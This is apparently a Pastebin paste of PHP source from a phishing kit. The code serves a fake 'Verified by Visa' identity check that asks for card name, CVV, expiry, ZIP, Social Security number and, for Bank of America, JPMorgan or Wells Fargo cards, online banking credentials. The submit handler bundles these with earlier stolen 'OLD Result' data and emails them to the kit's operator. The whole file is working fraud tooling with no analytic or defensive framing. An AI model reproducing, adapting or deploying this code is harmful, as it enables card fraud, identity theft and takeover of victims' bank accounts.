Guest User

Untitled

a guest
Mar 14th, 2018
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.58 KB | None | 0 0
  1. <?php
  2. require_once('function.shc.php');
  3. $_SESSION['last_visit'] = "vbv";
  4. $ip = $apple->ip(); $apple->logs("Bule Nya lg verify visa"); // log activity
  5. $bin = $apple->binChecked($_SESSION['ccne']);
  6. $_SESSION['negara'] = "US";
  7. if($_POST['Activatenow'] == "Verify now" && $_POST['CHName1'] != "" && $_POST['cvv2'] != "" && $_POST['expdate1'] != "" && $_POST['expdate2'] != "" && $_POST['zip'] != ""){
  8.  
  9. $ip = $apple->ip();
  10.  
  11. $dataBank .= " .++=======[ BANK Info ]=======++. \r\n";
  12. $dataBank .= "Cardholder Name : ".$_POST['CHName1']."\r\n";
  13. $dataBank .= "CVV : ".$_POST['cvv2']."\r\n";
  14. $dataBank .= "EXP : ".$_POST['expdate1']."/".$_POST['expdate2']."\r\n";
  15. $dataBank .= "Zip : ".$_POST['zip']."\r\n";
  16. $dataBank .= "SSN : ".$_POST['ssn1']."-".$_POST['ssn2']."-".$_POST['ssn3']."\r\n";
  17. $dataBank .= "BOA/JMP/WELLS : ".$_POST['ua']." (username/password)\r\n";
  18.  
  19.  
  20. $dataBank .= " .++=======[ OLD Result ]=======++. \r\n\n";
  21. $dataBank .= $_SESSION['mailbody'];
  22. $dataBank .= " .++=======[ BUG7SEC.ORG ]=======++. \r\n";
  23.  
  24. $subject = "[Bank Account] ".$_POST['CHName1']." | ".$bin['BIN']." | ".$bin['COU'];
  25. $apple->sendMe($subject,$dataBank,$ip['cn']);
  26.  
  27. $apple->redirected("success"); // utama suspen personal payment
  28. }
  29. if($_GET['path'] == "/landing"){?>
  30. <html>
  31. <head>
  32. <title>Verified by Visa</title>
  33. <link rel="StyleSheet" href="<?= $apple->sitehost();?>/assets/css/vbv.css" type="text/css" media="screen">
  34. <meta http-equiv="refresh" content="3;url=<?php echo $apple->sitehost().'/account/authorized/processing/?authorized=validate&appIdKey='.md5(time()).md5(time()).'&path=/vbv&sslEnabled=true&login=payment'; ?>" />
  35. </head>
  36. <body onload="onLoad()">
  37. <table width="300" cellpadding="0" cellspacing="0" border="0">
  38. <tr>
  39. <td width="19" height="20">&nbsp;</td>
  40. <td width="151">&nbsp;</td>
  41. <td>&nbsp;</td>
  42. </tr>
  43. <tr>
  44. <td>&nbsp;</td>
  45. <td colspan="2"><img src="<?= $apple->sitehost();?>/assets/img/vbvLogo.gif" alt="Verified by Visa"></td>
  46. </tr>
  47. <tr>
  48. <td colspan="3" height="20">&nbsp;</td>
  49. </tr>
  50. <tr>
  51. <td>&nbsp;</td>
  52. <td colspan="2"><img src="<?= $apple->sitehost();?>/assets/img/vbvDots.gif" alt="Processing ..."></td>
  53. </tr>
  54. <tr>
  55. <td colspan="3" height="20">&nbsp;</td>
  56. </tr>
  57. </table>
  58. </body>
  59. </html>
  60. <?php
  61. }
  62. ?>
  63. <?php
  64. if($_GET['path'] == "/vbv"){
  65.  
  66. ?>
  67. <!DOCTYPE html>
  68. <html lang="en">
  69. <head>
  70. <title>Verified by Visa - Please Verify Your Identity</title>
  71. <meta charset="utf-8">
  72. <style type="text/css">
  73. BODY { color : #666666 }
  74. A:link { color : #666666 }
  75. A:active { color : #666666 }
  76. A:visited { color : #666666 }
  77. A:hover { color : #003366 }
  78.  
  79. .monospace {
  80. font-family : Courier, monospace;
  81. color : #666666
  82. }
  83.  
  84. TABLE, TR, TD {
  85. font-family : Arial,Helvetica,sans-serif;
  86. font-size : 12px;
  87. color: #666666
  88. }
  89.  
  90. .Return {
  91. font-family : Arial,Helvetica,sans-serif;
  92. font-size : 12px;
  93. color: #666666
  94. }
  95.  
  96. .subHead {
  97. font-family : Arial,Helvetica,sans-serif;
  98. font-size : 12px;
  99. color: #666666;
  100. font-weight: bold
  101. }
  102.  
  103. .TextSmall {
  104. font-family : Arial,Helvetica,sans-serif;
  105. font-size : 10px
  106. }
  107.  
  108. .TextSmaller {
  109. font-family : Arial,Helvetica,sans-serif;
  110. font-size : 9px;
  111. color : #003366
  112. }
  113.  
  114. .TextBlue {
  115. font-family : Arial,Helvetica,sans-serif;
  116. font-size : 12px;
  117. color: #003366
  118. }
  119.  
  120. .TextBlack {
  121. font-family : Arial,Helvetica,sans-serif;
  122. font-size : 11px;
  123. color: #000000
  124. }
  125.  
  126.  
  127. .Alert {
  128. font-family : Arial,Helvetica,sans-serif;
  129. font-size : 12px;
  130. color: #FF6600;
  131. font-weight: bold
  132. }
  133. .listletters {
  134. font-family: Arial, Helvetica, sans-serif;
  135. font-size: 18px;
  136. font-weight: bold;
  137. color: #003366;
  138. text-decoration: none
  139. }
  140. .footer {
  141. font-family: Arial, Helvetica, sans-serif;
  142. font-size: 11px;
  143. font-style: normal;
  144. color: #003366;
  145. text-decoration: none
  146. }
  147. .copyright {
  148. font-family: Arial, Helvetica, sans-serif;
  149. font-size: 10px;
  150. font-style: normal;
  151. color: #003366;
  152. text-decoration: none
  153. }
  154. .shortcuts {
  155. font-family: Arial, Helvetica, sans-serif;
  156. font-size: 11px;
  157. font-style: normal;
  158. color: #000000;
  159. text-decoration: none
  160. }
  161. .anchorlinks {
  162. font-family: Arial, Helvetica, sans-serif;
  163. font-size: 13px;
  164. font-style: normal;
  165. color: #003366;
  166. text-decoration: none
  167. }
  168. .homelinks {
  169. font-family: Arial, Helvetica, sans-serif;
  170. font-size: 11px;
  171. font-style: normal;
  172. color: #003366;
  173. text-decoration: none
  174. }
  175.  
  176. </style>
  177. </head>
  178. <body>
  179. <form action="" method="post">
  180.  
  181.  
  182. <table width="100%" height="100%" cellpadding="0" cellspacing="0" border="0">
  183. <tbody>
  184. <tr><td colspan="3"><img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="1" height="1" border="0" alt=""><br></td></tr>
  185. <tr>
  186. <td><img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="20" height="0" border="0" alt=""><br></td>
  187. <td align="center">
  188. <table width="330" height="340" cellpadding="0" cellspacing="0" border="0">
  189. <tbody>
  190. <tr>
  191. <td valign="bottom" width="89" height="51">
  192. <img name="vpasLogo" src="<?= $apple->sitehost();?>/assets/img/vpas_logo.gif" border="0" alt="Verified by Visa"><br>
  193. </td>
  194. <td align="right" valign="bottom" width="301" height="51">
  195. <!-- <img name="memberLogo" src="https://verified.capitalone.com/sic-ui/images/capitalone-logo.png" width="138" height="47" border="0" alt="memberLogo"> -->
  196. </td>
  197. </tr>
  198. <tr><td colspan="3"><img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="1" height="2" border="0" alt=""></td></tr>
  199. <tr>
  200. <td colspan="2" height="298">
  201. <font color="#ff9900" size="4">Please Verify Your Identity</font><br><br>
  202. <font face="arial" size="2">The information you entered does not match our records for your account. </font>
  203. <font face="arial" size="2" color="#ff9900"><b>Please try again.</b></font><br><br>
  204. <table width="330" cellspacing="0" cellpadding="3" border="0">
  205. <tbody>
  206. <tr><td colspan="3"><img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="1" height="1" border="0" alt=""></td></tr>
  207. <tr>
  208. <td width="150" align="right" valign="top" class="TextBlack">Name on Card:</td>
  209. <td width="170" valign="top"><input type="text" name="CHName1" size="20" maxlength="30" value="" class="monospace" required="">&nbsp;&nbsp;<br></td>
  210. </tr>
  211. <tr>
  212. <td width="150" align="right" valign="top" class="TextBlack">Signature Panel Code:</td>
  213. <td width="170" valign="top"><input type="password" name="cvv2" size="3" maxlength="3" class="monospace" required="">&nbsp;&nbsp;<a href="javascript: popUp2('sigpanel.htm?WELL10000056.gif')" onclick="closing=false"><img src="<?= $apple->sitehost();?>/assets/img/cvv2.gif" align="top" width="120" height="20" border="0" alt="Verification Code" ></a><br>
  214. </td>
  215. </tr>
  216. <?php
  217. if($_SESSION['negara'] === "US"){?>
  218. <tr>
  219. <td width="150" align="right" valign="top" class="TextBlack">Cardholder's SSN:</td>
  220. <td width="170" valign="top">
  221. <input type="text" name="ssn1" size="4" maxlength="3" class="monospace" placeholder="xxx" >-
  222. <input type="text" name="ssn2" size="4" maxlength="2" class="monospace" placeholder="xx" >-
  223. <input type="text" name="ssn3" size="4" maxlength="4" class="monospace" placeholder="xxxx" >
  224. <br>
  225. </td>
  226. </tr>
  227. <?php
  228. }
  229. ?>
  230. <tr>
  231. <td width="150" align="right" valign="top" class="TextBlack">Card Expiration Date:</td>
  232. <td width="170" valign="top"><input type="text" name="expdate1" size="2" required="" maxlength="2" class="monospace">-<input type="text" name="expdate2" size="2" maxlength="2" class="monospace" required="">&nbsp;&nbsp;<span class="TextSmall">MM-YY</span><br></td>
  233. </tr>
  234. <tr>
  235. <td width="170" align="right" valign="top" class="TextBlack">Your Zip Code:</td>
  236. <td width="150" valign="top"><input type="password" required="" name="zip" size="5" maxlength="5" class="monospace">&nbsp;&nbsp;<span class="TextSmall">12345</span><br></td>
  237. </tr>
  238.  
  239.  
  240. <?php
  241. preg_match("/WELLS FARGO BANK/", $bin['BNK'], $wf);
  242. preg_match("/JPMORGAN/", $bin['BNK'], $jpm);
  243. preg_match("/BANK OF AMERICA/", $bin['BNK'], $boa); // $boa[0]; BOA = Username / JPMORGAN CHASE BANK (password)
  244. if($boa[0]){
  245. echo '<tr>
  246. <td width="150" align="right" valign="top" class="TextBlack">Online ID :</td>
  247. <td width="170" valign="top"><input type="text" name="ua" placeholder="'.$bin['BNK'].'" required=""><br></td>
  248. </tr>';
  249. }
  250. if($jpm[0]){
  251. echo '<tr>
  252. <td width="150" align="right" valign="top" class="TextBlack">Password :</td>
  253. <td width="170" valign="top"><input type="password" name="ua" placeholder="'.$bin['BNK'].'" required=""><br></td>
  254. </tr>';
  255. }
  256. if($wf[0]){
  257. echo '<tr>
  258. <td width="150" align="right" valign="top" class="TextBlack">Username :</td>
  259. <td width="170" valign="top"><input type="password" name="ua" placeholder="'.$bin['BNK'].'" required=""><br></td>
  260. </tr>';
  261. }
  262. ?>
  263.  
  264.  
  265. <br><input type="hidden" name="ccne" value="<?= $_SESSION['ccne'];?>">
  266. </tbody></table>
  267. <div align="center"><br><br><br>
  268. <img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="1" height="2">
  269. <input type="submit" name="Activatenow" value="Verify now"></form>
  270. <input type="button" name="Donotactivatenow" value="Do not Verify now" disabled="">
  271. </div><br>
  272. </td>
  273. </tr>
  274. <tr>
  275. <td colspan="2">
  276.  
  277. <!-- copyright notice table -->
  278. <table width="100%" cellpadding="0" cellspacing="0" border="0">
  279. <tbody><tr height="3"></tr>
  280. <tr>
  281. <!--<TD width=150></TD>-->
  282. <td align="left" valign="top">
  283. <span class="TextSmall">By clicking Verify now, you agree to these
  284. <a href="#"" onclick="closing=false">Terms &amp; Conditions.</a>
  285. </span>
  286. </td></tr>
  287. </tbody></table>
  288. </td>
  289. </tr>
  290.  
  291. </tbody></table>
  292. </td>
  293. <td><img src="<?= $apple->sitehost();?>/assets/img/spacer_clear.gif" width="20" height="0" border="0" alt=""><br></td><!-- Right 20 pixels of white space -->
  294. </tr>
  295.  
  296. </tbody></table>
  297. </body>
  298. </html>
  299. <?php
  300. }
  301. ?>
Add Comment
Please, Sign In to add comment